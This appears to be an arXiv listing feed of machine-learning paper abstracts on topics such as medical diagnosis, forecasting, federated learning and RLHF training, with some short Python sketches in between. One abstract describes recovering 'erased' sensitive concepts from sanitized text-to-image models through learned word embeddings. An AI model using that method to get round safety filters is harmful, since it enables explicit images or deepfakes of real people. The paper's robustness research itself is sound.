    Computer-aided diagnosis (CAD), a vibrant medical imaging research field, is expanding quickly. Because errors in medical diagnostic systems might lead to seriously misleading medical treatments, major efforts have been made in recent years to improve computer-aided diagnostics applications. The use of machine learning in computer-aided diagnosis is crucial. A simple equation may result in a false indication of items like organs. Therefore, learning from examples is a vital component of pattern recognition. Pattern recognition and machine learning in the biomedical area promise to increase the precision of disease detection and diagnosis. They also support the objectivity of the decision-making process. Machine learning provides a practical method for creating elegant and autonomous algorithms to analyze high-dimensional and multimodal biomedical data. This review article examines machine-learning algorithms for detecting diseases, including hepatitis, diabetes, liver disease, dengue fever, and heart disease. It draws attention to the collection of machine learning techniques and algorithms employed in studying these conditions and the ensuing decision-making process.
    Causal Discovery from Temporal Data: An Overview and New Perspectives. (arXiv:2303.10112v3 [cs.LG] UPDATED)
    Temporal data, representing chronological observations of complex systems, is a typical data structure widely generated in many domains, such as industry, medicine, and finance. Analyzing this type of data is extremely valuable for various applications. Thus, different temporal data analysis tasks, e.g., classification, clustering, and prediction, have been proposed in the past decades. Among them, causal discovery, learning the causal relations from temporal data, is considered an interesting yet critical task and has attracted much research attention. Existing causal discovery works can be divided into two highly correlated categories according to whether the temporal data is calibrated, i.e., multivariate time series causal discovery and event sequence causal discovery. However, most previous surveys focus only on time series causal discovery and ignore the second category. In this paper, we specify the correlation between the two categories and provide a systematic overview of existing solutions. Furthermore, we provide public datasets, evaluation metrics, and new perspectives for temporal data causal discovery.
    Price-Aware Deep Learning for Electricity Markets. (arXiv:2308.01436v1 [cs.LG])
    While deep learning gradually penetrates operational planning, its inherent prediction errors may significantly affect electricity prices. This letter examines how prediction errors propagate into electricity prices, revealing notable pricing errors and their spatial disparity in congested power systems. To improve fairness, we propose to embed electricity market-clearing optimization as a deep learning layer. Differentiating through this layer allows for balancing between prediction and pricing errors, as opposed to minimizing prediction errors alone. This layer implicitly optimizes fairness and controls the spatial distribution of price errors across the system. We showcase the price-aware deep learning in the nexus of wind power forecasting and short-term electricity market clearing.
    ROME: Robustifying Memory-Efficient NAS via Topology Disentanglement and Gradient Accumulation. (arXiv:2011.11233v2 [cs.LG] UPDATED)
    Albeit a prevalent architecture search approach, differentiable architecture search (DARTS) is largely hindered by its substantial memory cost, since the entire supernet resides in memory. This is where single-path DARTS comes in, which chooses only a single-path submodel at each step. While being memory-friendly, it also comes with low computational costs. Nonetheless, we discover a critical issue of single-path DARTS that has not been previously noticed. Namely, it also suffers from severe performance collapse, since too many parameter-free operations like skip connections are derived, just as DARTS does. In this paper, we propose a new algorithm called RObustifying Memory-Efficient NAS (ROME) as a remedy. First, we disentangle the topology search from the operation search to make searching and evaluation consistent. We then adopt Gumbel-Top2 reparameterization and gradient accumulation to robustify the unwieldy bi-level optimization. We verify ROME extensively across 15 benchmarks to demonstrate its effectiveness and robustness.
    Stable and consistent density-based clustering via multiparameter persistence. (arXiv:2005.09048v3 [math.ST] UPDATED)
    We consider the degree-Rips construction from topological data analysis, which provides a density-sensitive, multiparameter hierarchical clustering algorithm. We analyze its stability to perturbations of the input data using the correspondence-interleaving distance, a metric for hierarchical clusterings that we introduce. Taking certain one-parameter slices of degree-Rips recovers well-known methods for density-based clustering, but we show that these methods are unstable. However, we prove that degree-Rips, as a multiparameter object, is stable, and we propose an alternative approach for taking slices of degree-Rips, which yields a one-parameter hierarchical clustering algorithm with better stability properties. We prove that this algorithm is consistent, using the correspondence-interleaving distance. We provide an algorithm for extracting a single clustering from one-parameter hierarchical clusterings, which is stable with respect to the correspondence-interleaving distance. And, we integrate these methods into a pipeline for density-based clustering, which we call Persistable. Adapting tools from multiparameter persistent homology, we propose visualization tools that guide the selection of all parameters of the pipeline. We demonstrate Persistable on benchmark datasets, showing that it identifies multi-scale cluster structure in data.
    Fairness in Recommendation: Foundations, Methods and Applications. (arXiv:2205.13619v6 [cs.IR] UPDATED)
    As one of the most pervasive applications of machine learning, recommender systems play an important role in assisting human decision making. The satisfaction of users and the interests of platforms are closely related to the quality of the generated recommendation results. However, as highly data-driven systems, recommender systems can be affected by data or algorithmic bias and thus generate unfair results, which could weaken users' reliance on the systems. As a result, it is crucial to address potential unfairness problems in recommendation settings. Recently, there has been growing attention to fairness considerations in recommender systems, with more and more literature on approaches to promote fairness in recommendation. However, the studies are rather fragmented and lack a systematic organization, making the domain difficult for new researchers to penetrate. This motivates us to provide a systematic survey of existing works on fairness in recommendation. This survey focuses on the foundations of the fairness-in-recommendation literature. It first presents a brief introduction to fairness in basic machine learning tasks such as classification and ranking, in order to provide a general overview of fairness research and to introduce the more complex situations and challenges that need to be considered when studying fairness in recommender systems. After that, the survey introduces fairness in recommendation with a focus on taxonomies of current fairness definitions, typical techniques for improving fairness, and datasets for fairness studies in recommendation. The survey also discusses the challenges and opportunities in fairness research, with the hope of promoting the fair recommendation research area and beyond.
    Mlinear: Rethink the Linear Model for Time-series Forecasting. (arXiv:2305.04800v2 [cs.LG] UPDATED)
    Recently, significant advancements have been made in time-series forecasting research, with an increasing focus on analyzing the nature of time-series data, e.g., channel-independence (CI) and channel-dependence (CD), rather than solely on designing sophisticated forecasting models. However, current research has primarily focused on either CI or CD in isolation, and the challenge of effectively combining these two opposing properties to achieve a synergistic effect remains unresolved. In this paper, we carefully examine the opposing properties of CI and CD and raise a practical question that has not been effectively answered: how to effectively mix the CI and CD properties of time series to achieve better predictive performance? To answer this question, we propose Mlinear (MIX-Linear), a simple yet effective method based mainly on linear layers. The design philosophy of Mlinear includes two aspects: (1) dynamically tuning the CI and CD properties based on the time semantics of different input time series, and (2) providing deep supervision to adjust the individual performance of the "CI predictor" and "CD predictor". In addition, we empirically introduce a new loss function that significantly outperforms the widely used mean squared error (MSE) on multiple datasets. Experiments on widely used time-series datasets covering multiple fields demonstrate the superiority of our method over PatchTST, the latest Transformer-based method, in terms of the MSE and MAE metrics on 7 datasets with identical sequence inputs (336 or 512). Specifically, our method significantly outperforms PatchTST with a ratio of 21:3 at a 336 sequence-length input and 29:10 at a 512 sequence-length input. Additionally, our approach has a 10$\times$ efficiency advantage at the unit level, taking into account both training and inference times.
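The CI/CD distinction above has a simple linear-algebra reading: a channel-independent head applies one shared length-to-horizon map to every channel, while a channel-dependent head applies one joint map over the flattened multivariate series. The sketch below mixes the two with a fixed gate; the paper's Mlinear tunes this mixing dynamically from the input, so the fixed `gate`, the random weights, and the shapes here are all illustrative assumptions.

```python
import numpy as np

rng = np.random.default_rng(0)
L, C, H = 336, 7, 96           # input length, channels, forecast horizon

# Channel-independent head: one L -> H linear map shared by every channel.
W_ci = rng.normal(scale=0.01, size=(L, H))
# Channel-dependent head: one (L*C) -> (H*C) map over the flattened series.
W_cd = rng.normal(scale=0.01, size=(L * C, H * C))

def forecast(x, gate=0.5):
    """x: (L, C) multivariate series -> (H, C) forecast mixing CI and CD heads.
    `gate` stands in for the paper's input-dependent tuning (fixed here)."""
    y_ci = x.T @ W_ci                        # (C, H): per-channel shared map
    y_cd = (x.T.reshape(-1) @ W_cd).reshape(C, H)  # joint map over channels
    y = gate * y_ci + (1.0 - gate) * y_cd    # convex mix of the two properties
    return y.T                               # (H, C)

x = rng.normal(size=(L, C))
y = forecast(x)
```

Note how the CI head has L*H parameters regardless of the channel count, while the CD head grows quadratically with C; the gate lets the model trade between them.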
    Hierarchical Federated Learning in Wireless Networks: Pruning Tackles Bandwidth Scarcity and System Heterogeneity. (arXiv:2308.01562v1 [eess.SY])
    A practical wireless network has many tiers in which end users do not directly communicate with the central server; moreover, the users' devices have limited computation and battery power, and the serving base station (BS) has a fixed bandwidth. Owing to these practical constraints and system models, this paper leverages model pruning and proposes pruning-enabled hierarchical federated learning (PHFL) in heterogeneous networks (HetNets). We first derive an upper bound on the convergence rate that clearly demonstrates the impact of model pruning and of the wireless communications between the clients and the associated BS. Then we jointly optimize the model pruning ratio, central processing unit (CPU) frequency, and transmission power of the clients in order to minimize the controllable terms of the convergence bound under strict delay and energy constraints. However, since the original problem is not convex, we perform successive convex approximation (SCA) and jointly optimize the parameters for the relaxed convex problem. Through extensive simulation, we validate the effectiveness of our proposed PHFL algorithm in terms of test accuracy, wall clock time, energy consumption, and bandwidth requirement.
    COVID-VR: A Deep Learning COVID-19 Classification Model Using Volume-Rendered Computer Tomography. (arXiv:2308.01433v1 [eess.IV])
    The COVID-19 pandemic presented numerous challenges to healthcare systems worldwide. Given that lung infections are prevalent among COVID-19 patients, chest Computer Tomography (CT) scans have frequently been utilized as an alternative method for identifying COVID-19 conditions and various other types of pulmonary diseases. Deep learning architectures have emerged to automate the identification of pulmonary disease types by leveraging CT scan slices as inputs for classification models. This paper introduces COVID-VR, a novel approach for classifying pulmonary diseases based on volume rendering images of the lungs captured from multiple angles, thereby providing a comprehensive view of the entire lung in each image. To assess the effectiveness of our proposal, we compared it against competing strategies utilizing both private data obtained from partner hospitals and a publicly available dataset. The results demonstrate that our approach effectively identifies pulmonary lesions and performs competitively when compared to slice-based methods.
    Reasoning in Large Language Models Through Symbolic Math Word Problems. (arXiv:2308.01906v1 [cs.CL])
    Large language models (LLMs) have revolutionized NLP by solving downstream tasks with little to no labeled data. Despite their versatile abilities, the larger question of their ability to reason remains ill-understood. This paper addresses reasoning in math word problems (MWPs) by studying symbolic versions of the numeric problems, since a symbolic expression is a "concise explanation" of the numeric answer. We create and use a symbolic version of the SVAMP dataset and find that GPT-3's davinci-002 model also has good zero-shot accuracy on symbolic MWPs. To evaluate the faithfulness of the model's reasoning, we go beyond accuracy and additionally evaluate the alignment between the final answer and the outputted reasoning, which correspond to numeric and symbolic answers respectively for MWPs. We explore a self-prompting approach to encourage the symbolic reasoning to align with the numeric answer, thus equipping the LLM with the ability to provide a concise and verifiable reasoning and making it more interpretable. Surprisingly, self-prompting also improves the symbolic accuracy to be higher than both the numeric and symbolic accuracies, thus providing an ensembling effect. The SVAMP_Sym dataset will be released for future research on symbolic math problems.
    Hard Adversarial Example Mining for Improving Robust Fairness. (arXiv:2308.01823v1 [cs.LG])
    Adversarial training (AT) is widely considered the state-of-the-art technique for improving the robustness of deep neural networks (DNNs) against adversarial examples (AE). Nevertheless, recent studies have revealed that adversarially trained models are prone to unfairness problems, restricting their applicability. In this paper, we empirically observe that this limitation may be attributed to serious adversarial confidence overfitting, i.e., certain adversarial examples with overconfidence. To alleviate this problem, we propose HAM, a straightforward yet effective framework via adaptive Hard Adversarial example Mining. HAM concentrates on mining hard adversarial examples while discarding the easy ones in an adaptive fashion. Specifically, HAM identifies hard AEs in terms of the step sizes needed to cross the decision boundary when calculating the loss value. Besides, an early-dropping mechanism is incorporated to discard the easy examples at the initial stages of AE generation, resulting in efficient AT. Extensive experimental results on CIFAR-10, SVHN, and Imagenette demonstrate that HAM achieves significant improvement in robust fairness while reducing computational cost compared to several state-of-the-art adversarial training methods. The code will be made publicly available.
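The mining step described above — keep the adversarial examples that were hard to flip, drop the easy ones — reduces to a ranking over a per-example hardness score. The sketch below uses the number of attack steps needed to cross the decision boundary as that score; the `keep_frac` knob and the toy step counts are illustrative assumptions, not the paper's adaptive schedule.

```python
import numpy as np

def mine_hard_examples(steps_to_cross, keep_frac=0.5):
    """Keep the examples that needed the most attack steps to cross the
    decision boundary (a proxy for 'hard'); drop the easy rest.
    keep_frac is an illustrative knob, not HAM's adaptive schedule."""
    order = np.argsort(-steps_to_cross)           # hardest first
    k = max(1, int(len(steps_to_cross) * keep_frac))
    return order[:k]

steps = np.array([1, 9, 3, 7])   # attack steps each example took to flip the label
hard_idx = mine_hard_examples(steps)
```

The early-dropping mechanism would additionally abandon AE generation for examples that flip within the first few steps, so their full attack cost is never paid.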
    DeepSpeed-Chat: Easy, Fast and Affordable RLHF Training of ChatGPT-like Models at All Scales. (arXiv:2308.01320v1 [cs.LG])
    ChatGPT-like models have revolutionized various applications in artificial intelligence, from summarization and coding to translation, matching or even surpassing human performance. However, the current landscape lacks an accessible, efficient, and cost-effective end-to-end RLHF (Reinforcement Learning with Human Feedback) training pipeline for these powerful models, particularly when training at the scale of billions of parameters. This paper introduces DeepSpeed-Chat, a novel system that democratizes RLHF training, making it accessible to the AI community. DeepSpeed-Chat offers three key capabilities: an easy-to-use training and inference experience for ChatGPT-like models, a DeepSpeed-RLHF pipeline that replicates the training pipeline from InstructGPT, and a robust DeepSpeed-RLHF system that combines various optimizations for training and inference in a unified way. The system delivers unparalleled efficiency and scalability, enabling training of models with hundreds of billions of parameters in record time and at a fraction of the cost. With this development, DeepSpeed-Chat paves the way for broader access to advanced RLHF training, even for data scientists with limited resources, thereby fostering innovation and further development in the field of AI.
    Deep Learning-based Prediction of Stress and Strain Maps in Arterial Walls for Improved Cardiovascular Risk Assessment. (arXiv:2308.01771v1 [cs.LG])
    This study investigated the potential of end-to-end deep learning tools as a more effective substitute for FEM in predicting stress-strain fields within 2D cross sections of arterial wall. We first proposed a U-Net based fully convolutional neural network (CNN) to predict the von Mises stress and strain distribution based on the spatial arrangement of calcification within arterial wall cross-sections. Further, we developed a conditional generative adversarial network (cGAN) to enhance, particularly from the perceptual perspective, the prediction accuracy of stress and strain field maps for arterial walls with various calcification quantities and spatial configurations. On top of U-Net and cGAN, we also proposed their ensemble approaches, respectively, to further improve the prediction accuracy of field maps. Our dataset, consisting of input and output images, was generated by implementing boundary conditions and extracting stress-strain field maps. The trained U-Net models can accurately predict von Mises stress and strain fields, with structural similarity index scores (SSIM) of 0.854 and 0.830 and mean squared errors of 0.017 and 0.018 for stress and strain, respectively, on a reserved test set. Meanwhile, the cGAN models in a combination of ensemble and transfer learning techniques demonstrate high accuracy in predicting von Mises stress and strain fields, as evidenced by SSIM scores of 0.890 for stress and 0.803 for strain. Additionally, mean squared errors of 0.008 for stress and 0.017 for strain further support the model's performance on a designated test set. Overall, this study developed a surrogate model for finite element analysis, which can accurately and efficiently predict stress-strain fields of arterial walls regardless of complex geometries and boundary conditions.
    No Agreement Without Loss: Learning and Social Choice in Peer Review. (arXiv:2211.02144v2 [cs.AI] UPDATED)
    In peer review systems, reviewers are often asked to evaluate various features of submissions, such as technical quality or novelty. A score is given to each of the predefined features, and based on these the reviewer has to provide an overall quantitative recommendation. It may be assumed that each reviewer has her own mapping from the set of features to a recommendation, and that different reviewers have different mappings in mind. This introduces an element of arbitrariness known as commensuration bias. In this paper we discuss a framework, introduced by Noothigattu, Shah and Procaccia, and then applied by the organizers of the AAAI 2022 conference. Noothigattu, Shah and Procaccia proposed to aggregate reviewers' mappings by minimizing certain loss functions, and studied axiomatic properties of this approach, in the sense of social choice theory. We challenge several of the results and assumptions used in their work and report a number of negative results. On the one hand, we study a trade-off between some of the axioms proposed and the ability of the method to properly capture agreements of the majority of reviewers. On the other hand, we show that dropping a certain unrealistic assumption has dramatic effects, including causing the method to be discontinuous.
    An Effective Data Creation Pipeline to Generate High-quality Financial Instruction Data for Large Language Model. (arXiv:2308.01415v1 [cs.CL])
    In the early era of large language models, it is critical to generate high-quality financial datasets for fine-tuning a large language model on finance-related tasks. Thus, this paper presents a carefully designed data creation pipeline for this purpose. In particular, we initiate a dialogue between an AI investor and a financial expert using ChatGPT and incorporate the feedback of human financial experts, leading to the refinement of the dataset. This pipeline yielded a robust instruction tuning dataset comprising 103k multi-turn chats. Extensive experiments have been conducted on this dataset to evaluate the model's performance, adopting an external GPT-4 as the judge. The promising experimental results verify that our approach leads to significant advancements in generating accurate, relevant, and financial-style responses from AI models, thus providing a powerful tool for applications within the financial sector.
    Feature Noise Boosts DNN Generalization under Label Noise. (arXiv:2308.01609v1 [cs.LG])
    The presence of label noise in the training data has a profound impact on the generalization of deep neural networks (DNNs). In this study, we introduce and theoretically demonstrate that a simple feature noise method, which directly adds noise to the features of training data, can enhance the generalization of DNNs under label noise. Specifically, our theoretical analyses reveal that label noise weakens DNN generalization by loosening the PAC-Bayes generalization bound, while feature noise improves DNN generalization by imposing an upper bound on the mutual information between the model weights and the features, which constrains the PAC-Bayes generalization bound. Furthermore, to ensure effective generalization of DNNs in the presence of label noise, we conduct application analyses to identify the optimal types and levels of feature noise to add for obtaining desirable label-noise generalization. Finally, extensive experimental results on several popular datasets demonstrate that the feature noise method can significantly enhance the label-noise generalization of the state-of-the-art label noise method.
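The method itself is as simple as the abstract claims: perturb the training features directly before each update. A minimal sketch, where the noise types and the `level=0.1` value are illustrative stand-ins for the "optimal types and levels" the paper identifies:

```python
import numpy as np

def add_feature_noise(X, noise_type="gaussian", level=0.1, rng=None):
    """Directly perturb training features; the type and level are the knobs
    the paper tunes against the label-noise rate (values here are illustrative)."""
    if rng is None:
        rng = np.random.default_rng(0)
    if noise_type == "gaussian":
        return X + rng.normal(scale=level, size=X.shape)
    if noise_type == "uniform":
        return X + rng.uniform(-level, level, size=X.shape)
    raise ValueError(f"unknown noise type: {noise_type}")

X = np.zeros((4, 3))                 # toy feature batch
X_noisy = add_feature_noise(X, level=0.1)
```

In a training loop this would be applied fresh to each mini-batch, so the network never sees the same perturbed features twice.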
    MusicLDM: Enhancing Novelty in Text-to-Music Generation Using Beat-Synchronous Mixup Strategies. (arXiv:2308.01546v1 [cs.SD])
    Diffusion models have shown promising results in cross-modal generation tasks, including text-to-image and text-to-audio generation. However, generating music, as a special type of audio, presents unique challenges due to limited availability of music data and sensitive issues related to copyright and plagiarism. In this paper, to tackle these challenges, we first construct a state-of-the-art text-to-music model, MusicLDM, that adapts Stable Diffusion and AudioLDM architectures to the music domain. We achieve this by retraining the contrastive language-audio pretraining model (CLAP) and the Hifi-GAN vocoder, as components of MusicLDM, on a collection of music data samples. Then, to address the limitations of training data and to avoid plagiarism, we leverage a beat tracking model and propose two different mixup strategies for data augmentation: beat-synchronous audio mixup and beat-synchronous latent mixup, which recombine training audio directly or via a latent embeddings space, respectively. Such mixup strategies encourage the model to interpolate between musical training samples and generate new music within the convex hull of the training data, making the generated music more diverse while still staying faithful to the corresponding style. In addition to popular evaluation metrics, we design several new evaluation metrics based on CLAP score to demonstrate that our proposed MusicLDM and beat-synchronous mixup strategies improve both the quality and novelty of generated music, as well as the correspondence between input text and generated music.
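At its core, the audio-mixup strategy above is a convex combination of two training clips; the "beat-synchronous" part constrains which clips may be paired and how they are aligned. The sketch below shows only the mixing step — the beat-tracker alignment is omitted, and the random stand-in signals and the Beta-distributed coefficient are assumptions for illustration.

```python
import numpy as np

def mixup_audio(x1, x2, lam):
    """Convex combination of two (already beat-aligned) waveforms.
    Beat alignment itself would come from a beat tracking model, omitted here."""
    assert x1.shape == x2.shape, "mixup assumes the clips are aligned in time"
    return lam * x1 + (1.0 - lam) * x2

rng = np.random.default_rng(0)
clip_a = rng.normal(size=16000)      # one second at 16 kHz, stand-in signals
clip_b = rng.normal(size=16000)
lam = rng.beta(5.0, 5.0)             # mixup coefficient drawn from a Beta prior
mixed = mixup_audio(clip_a, clip_b, lam)
```

The paper's latent variant applies the same combination to CLAP/AudioLDM latent embeddings rather than raw waveforms, which keeps the interpolation inside the model's learned representation space.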
    SAP-sLDA: An Interpretable Interface for Exploring Unstructured Text. (arXiv:2308.01420v1 [cs.CL])
    A common way to explore text corpora is through low-dimensional projections of the documents, where one hopes that thematically similar documents will be clustered together in the projected space. However, popular algorithms for dimensionality reduction of text corpora, like Latent Dirichlet Allocation (LDA), often produce projections that do not capture human notions of document similarity. We propose a semi-supervised human-in-the-loop LDA-based method for learning topics that preserve semantically meaningful relationships between documents in low-dimensional projections. On synthetic corpora, our method yields more interpretable projections than baseline methods with only a fraction of labels provided. On a real corpus, we obtain qualitatively similar results.
    Revisiting Deformable Convolution for Depth Completion. (arXiv:2308.01905v1 [cs.CV])
    Depth completion, which aims to generate high-quality dense depth maps from sparse depth maps, has attracted increasing attention in recent years. Previous work usually employs RGB images as guidance, and introduces iterative spatial propagation to refine estimated coarse depth maps. However, most of the propagation refinement methods require several iterations and suffer from a fixed receptive field, which may contain irrelevant and useless information with very sparse input. In this paper, we address these two challenges simultaneously by revisiting the idea of deformable convolution. We propose an effective architecture that leverages deformable kernel convolution as a single-pass refinement module, and empirically demonstrate its superiority. To better understand the function of deformable convolution and exploit it for depth completion, we further systematically investigate a variety of representative strategies. Our study reveals that, different from prior work, deformable convolution needs to be applied on an estimated depth map with a relatively high density for better performance. We evaluate our model on the large-scale KITTI dataset and achieve state-of-the-art level performance in both accuracy and inference speed. Our code is available at https://github.com/AlexSunNik/ReDC.
    ProMix: Combating Label Noise via Maximizing Clean Sample Utility. (arXiv:2207.10276v4 [cs.LG] UPDATED)
    Learning with Noisy Labels (LNL) has become an appealing topic, as imperfectly annotated data are relatively cheap to obtain. Recent state-of-the-art approaches employ specific selection mechanisms to separate clean and noisy samples and then apply Semi-Supervised Learning (SSL) techniques for improved performance. However, the selection step mostly provides a medium-sized, decent-enough clean subset, which overlooks a rich set of clean samples. To remedy this, we propose a novel LNL framework, ProMix, that attempts to maximize the utility of clean samples for boosted performance. Key to our method is a matched high-confidence selection technique that selects examples with high confidence scores and predictions matching their given labels, in order to dynamically expand a base clean sample set. To overcome the potential side effects of this aggressive clean-set selection procedure, we further devise a novel SSL framework that is able to train balanced and unbiased classifiers on the separated clean and noisy samples. Extensive experiments demonstrate that ProMix significantly advances the current state-of-the-art results on multiple benchmarks with different types and levels of noise. It achieves an average improvement of 2.48\% on the CIFAR-N dataset. The code is available at https://github.com/Justherozen/ProMix
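The matched high-confidence selection rule above combines two conditions: the model's predicted class must agree with the given (possibly noisy) label, and the prediction confidence must clear a threshold. A minimal sketch, where the 0.95 threshold and the toy probabilities are illustrative assumptions:

```python
import numpy as np

def matched_high_confidence(probs, labels, threshold=0.95):
    """Select indices whose predicted class matches the given (possibly noisy)
    label AND whose confidence exceeds the threshold, dynamically expanding a
    base clean sample set (the threshold value here is illustrative)."""
    preds = probs.argmax(axis=1)
    conf = probs.max(axis=1)
    return np.where((preds == labels) & (conf >= threshold))[0]

probs = np.array([[0.98, 0.02],    # confident and matches label 0 -> selected
                  [0.60, 0.40],    # matches label but low confidence -> rejected
                  [0.01, 0.99]])   # confident but contradicts label 0 -> rejected
labels = np.array([0, 0, 0])
clean_idx = matched_high_confidence(probs, labels)
```

Requiring agreement with the label, not just high confidence, is what keeps the expanded set from absorbing confidently mislabeled examples.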
    Evaluating Link Prediction Explanations for Graph Neural Networks. (arXiv:2308.01682v1 [cs.LG])
    Graph Machine Learning (GML) has numerous applications, such as node/graph classification and link prediction, in real-world domains. Providing human-understandable explanations for GML models is a challenging yet fundamental task to foster their adoption, but validating explanations for link prediction models has received little attention. In this paper, we provide quantitative metrics to assess the quality of link prediction explanations, with or without ground-truth. State-of-the-art explainability methods for Graph Neural Networks are evaluated using these metrics. We discuss how underlying assumptions and technical details specific to the link prediction task, such as the choice of distance between node embeddings, can influence the quality of the explanations.
    Circumventing Concept Erasure Methods For Text-to-Image Generative Models. (arXiv:2308.01508v1 [cs.LG])
    Text-to-image generative models can produce photo-realistic images for an extremely broad range of concepts, and their usage has proliferated widely among the general public. On the flip side, these models have numerous drawbacks, including their potential to generate images featuring sexually explicit content, mirror artistic styles without permission, or even hallucinate (or deepfake) the likenesses of celebrities. Consequently, various methods have been proposed in order to "erase" sensitive concepts from text-to-image models. In this work, we examine five recently proposed concept erasure methods, and show that targeted concepts are not fully excised from any of these methods. Specifically, we leverage the existence of special learned word embeddings that can retrieve "erased" concepts from the sanitized models with no alterations to their weights. Our results highlight the brittleness of post hoc concept erasure methods, and call into question their use in the algorithmic toolkit for AI safety.
    Fast Slate Policy Optimization: Going Beyond Plackett-Luce. (arXiv:2308.01566v1 [cs.LG])
    An increasingly important building block of large-scale machine learning systems is based on returning slates: ordered lists of items given a query. Applications of this technology include search, information retrieval, and recommender systems. When the action space is large, decision systems are restricted to a particular structure to complete online queries quickly. This paper addresses the optimization of these large-scale decision systems given an arbitrary reward function. We cast this learning problem in a policy optimization framework and propose a new class of policies, born from a novel relaxation of decision functions. This results in a simple yet efficient learning algorithm that scales to massive action spaces. We compare our method to the commonly adopted Plackett-Luce policy class and demonstrate the effectiveness of our approach on problems with action space sizes on the order of millions.
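For context, the Plackett-Luce baseline mentioned above can be sampled with the well-known Gumbel-top-k trick; the sketch below is a generic illustration of that baseline policy class, not the paper's proposed method:

```python
import numpy as np

def sample_slate_plackett_luce(logits, slate_size, rng):
    """Sample a slate (ordered list of item indices) from a Plackett-Luce
    policy via the Gumbel-top-k trick: perturb each logit with i.i.d.
    Gumbel noise and take the top-k, which has the same distribution as
    sequentially sampling without replacement proportional to exp(logits)."""
    gumbel = rng.gumbel(size=logits.shape)
    perturbed = logits + gumbel
    return np.argsort(-perturbed)[:slate_size]

rng = np.random.default_rng(0)
logits = np.log(np.array([10.0, 5.0, 1.0, 0.5, 0.1]))  # toy item scores
slate = sample_slate_plackett_luce(logits, slate_size=3, rng=rng)
```

Note that this trick still requires perturbing and sorting all item logits, which hints at why alternatives are sought when the action space reaches millions of items.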
    Careful Whisper -- leveraging advances in automatic speech recognition for robust and interpretable aphasia subtype classification. (arXiv:2308.01327v1 [cs.SD])
    This paper presents a fully automated approach for identifying speech anomalies from voice recordings to aid in the assessment of speech impairments. By combining Connectionist Temporal Classification (CTC) and encoder-decoder-based automatic speech recognition models, we generate rich acoustic and clean transcripts. We then apply several natural language processing methods to extract features from these transcripts to produce prototypes of healthy speech. Basic distance measures from these prototypes serve as input features for standard machine learning classifiers, yielding human-level accuracy for the distinction between recordings of people with aphasia and a healthy control group. Furthermore, the most frequently occurring aphasia types can be distinguished with 90% accuracy. The pipeline is directly applicable to other diseases and languages, showing promise for robustly extracting diagnostic speech biomarkers.
    UniG-Encoder: A Universal Feature Encoder for Graph and Hypergraph Node Classification. (arXiv:2308.01650v1 [cs.LG])
    Graph and hypergraph representation learning has attracted increasing attention from various research fields. Despite their decent performance and fruitful applications, Graph Neural Networks (GNNs), Hypergraph Neural Networks (HGNNs), and their well-designed variants are outperformed by even a simple Multi-Layer Perceptron on some commonly used benchmark graphs and hypergraphs. This observation motivates a reexamination of the design paradigm of current GNNs and HGNNs and poses the challenge of extracting graph features effectively. In this work, a universal feature encoder for both graph and hypergraph representation learning, called UniG-Encoder, is designed. The architecture starts with a forward transformation of the topological relationships of connected nodes into edge or hyperedge features via a normalized projection matrix. The resulting edge/hyperedge features, together with the original node features, are fed into a neural network. The encoded node embeddings are then derived from the reversed transformation, described by the transpose of the projection matrix, of the network's output, and can be further used for tasks such as node classification. In contrast to traditional spectral-based and/or message-passing approaches, the proposed architecture simultaneously and comprehensively exploits the node features and the graph/hypergraph topology in an efficient and unified manner, covering both heterophilic and homophilic graphs. The designed projection matrix, encoding the graph features, is intuitive and interpretable. Extensive experiments demonstrate the superior performance of the proposed framework on twelve representative hypergraph datasets and six real-world graph datasets, compared to state-of-the-art methods. Our implementation is available online at https://github.com/MinhZou/UniG-Encoder.
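The forward/reversed transformations described above can be sketched on a toy hypergraph; the averaging normalization, the one-layer tanh network, and the identity block for node rows are illustrative assumptions here, not the paper's exact design:

```python
import numpy as np

# Toy hypergraph: 4 nodes, 2 hyperedges {0,1,2} and {2,3}.
incidence = np.array([[1.0, 1.0, 1.0, 0.0],
                      [0.0, 0.0, 1.0, 1.0]])
# Normalized projection matrix: each hyperedge row averages its member nodes.
P = incidence / incidence.sum(axis=1, keepdims=True)

rng = np.random.default_rng(1)
X = rng.normal(size=(4, 8))            # node features
edge_feats = P @ X                     # forward transformation: hyperedge features
net_in = np.vstack([X, edge_feats])    # node rows plus hyperedge rows fed to the network
W = rng.normal(size=(8, 4))
net_out = np.tanh(net_in @ W)          # stand-in for the neural network
P_full = np.vstack([np.eye(4), P])     # node rows pass through; hyperedge rows project back
node_emb = P_full.T @ net_out          # reversed transformation via the transpose
```

The key point illustrated is that one projection matrix and its transpose carry topology into, and back out of, an otherwise structure-agnostic network.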
    Bidirectional Contrastive Split Learning for Visual Question Answering. (arXiv:2208.11435v3 [cs.CV] UPDATED)
    Visual Question Answering (VQA) based on multi-modal data facilitates real-life applications such as home robots and medical diagnoses. One significant challenge is to devise a robust decentralized learning framework for various client models where centralized data collection is avoided due to confidentiality concerns. This work aims to tackle privacy-preserving VQA by decoupling a multi-modal model into representation modules and a contrastive module and leveraging inter-module gradient sharing and inter-client weight sharing. To this end, we propose Bidirectional Contrastive Split Learning (BiCSL) to train a global multi-modal model on the entire data distribution of decentralized clients. We employ a contrastive loss that enables more efficient self-supervised learning of decentralized modules. Comprehensive experiments are conducted on the VQA-v2 dataset based on five SOTA VQA models, demonstrating the effectiveness of the proposed method. Furthermore, we inspect BiCSL's robustness against a dual-key backdoor attack on VQA. BiCSL shows much stronger robustness to this multi-modal adversarial attack than the centralized learning method, providing a promising approach to decentralized multi-modal learning.
    Lode Enhancer: Level Co-creation Through Scaling. (arXiv:2308.01543v1 [cs.LG])
    We explore AI-powered upscaling as a design assistance tool in the context of creating 2D game levels. Deep neural networks are used to upscale artificially downscaled patches of levels from the puzzle platformer game Lode Runner. The trained networks are incorporated into a web-based editor, where the user can create and edit levels at three different levels of resolution: 4x4, 8x8, and 16x16. An edit at any resolution instantly transfers to the other resolutions. As upscaling requires inventing features that might not be present at lower resolutions, we train neural networks to reproduce these features. We introduce a neural network architecture that is capable of not only learning upscaling but also giving higher priority to less frequent tiles. To investigate the potential of this tool and guide further development, we conduct a qualitative study with 3 designers to understand how they use it. Designers enjoyed co-designing with the tool, liked its underlying concept, and provided feedback for further improvement.
    Interleaving GANs with knowledge graphs to support design creativity for book covers. (arXiv:2308.01626v1 [cs.CV])
